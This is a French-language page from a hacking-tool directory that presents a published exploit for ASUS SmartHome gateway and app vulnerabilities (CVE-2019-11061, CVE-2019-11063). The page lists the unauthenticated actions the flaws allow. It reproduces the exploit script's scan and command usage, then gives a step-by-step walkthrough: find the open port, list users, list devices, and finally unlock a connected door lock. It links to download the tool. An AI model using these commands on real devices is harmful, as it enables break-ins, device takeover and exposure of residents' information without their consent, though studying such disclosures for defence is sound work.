Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ASUS-SmartHome-Exploit — Exploit ASUS SmartHome pour CVE-2019-11061 et CVE-2019-11063 | Kitploit
Outils/GitHubGitHub/tim124058/asus-smarthome-exploit
Sécurité IoTAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubtim124058/asus-smarthome-exploit

ASUS-SmartHome-Exploit

Exploit ASUS SmartHome pour CVE-2019-11061 et CVE-2019-11063

Voir le dépôt
237il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ASUS-SmartHome-Exploit

Identifiants CVE

CVE-2019-11061 : Contrôle d'accès défaillant dans HG100

Produits concernés : ASUS SmartHome Gateway HG100 version du firmware < 4.00.09

CVE-2019-11063 : Contrôle d'accès défaillant dans l'application SmartHome

Produits concernés : application Android ASUS SmartHome version < 3.0.45_190701

Description

Si l'attaquant se trouve sur le même réseau interne que le HG100 ou qu'un appareil mobile avec l'application compagnon (Android ou iPhone). L'attaquant peut envoyer des demandes de contrôle à ceux-ci.

L'attaquant n'a alors besoin d'aucune authentification pour effectuer les actions suivantes :
1. Obtenir tous les noms d'utilisateurs ajoutés au HG100.
2. Obtenir toutes les informations des appareils connectés à la passerelle SmartHome (HG100).
3. Contrôler tous les appareils contrôlables (par ex. DoorLock, Meter Plug ...) connectés à la passerelle SmartHome.
Les actions suivantes nécessitent un mot de passe (4 à 6 chiffres, défaut : "0000") :
1. Ajouter des utilisateurs au HG100.

Utilisation de l'exploit :

scan du port exploitable :

root@kitploit:~
usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

envoyer une commande à la cible :

root@kitploit:~
usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

Remarque : 2019/5/15 - ASUS a publié une mise à jour pour l'application SmartHome (3.0.42_190515) et la passerelle (4.00.06). Et a ajouté SSL au service HTTP. Mais cette vulnérabilité existe toujours. Pour cette mise à jour, vous devez spécifier le protocole lorsque vous utilisez l'argument "cmd". Par exemple :
root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -l

Exemple d'utilisation :

Étape 1 :

Scanner le port exploitable de l'appareil mobile (avec l'application compagnon installée pour Android ou iPhone) :
port de l'application P.S. L'option -v listera les utilisateurs qui ont été ajoutés au HG100.

ou

Scanner le port exploitable du HG100 :
port HG100

Étape 2 :

Obtenir tous les utilisateurs qui ont été ajoutés au HG100 : liste des utilisateurs

ou en ajouter un nouveau : ajouter un utilisateur

Remarque : utilisez https://10.42.50.166:8083 pour l'argument "cmd".
Par exemple :

root@kitploit:~
$ ./exploit.py cmd https://10.42.50.166:8083 -u

Étape 3 :

Obtenir toutes les informations des appareils connectés à la passerelle SmartHome : liste des appareils P.S. Si l'option --user n'est pas définie, le premier utilisateur du HG100 sera sélectionné automatiquement. (Parce qu'aucun mot de passe n'est nécessaire)

Comparaison avec l'application :


Étape 4 :

Contrôler (déverrouiller) le DoorLock. contrôle de l'appareil P.S. la valeur 1028 est obtenue à partir de l'option -l (étape 3).

Résultat :

Télécharger l’outil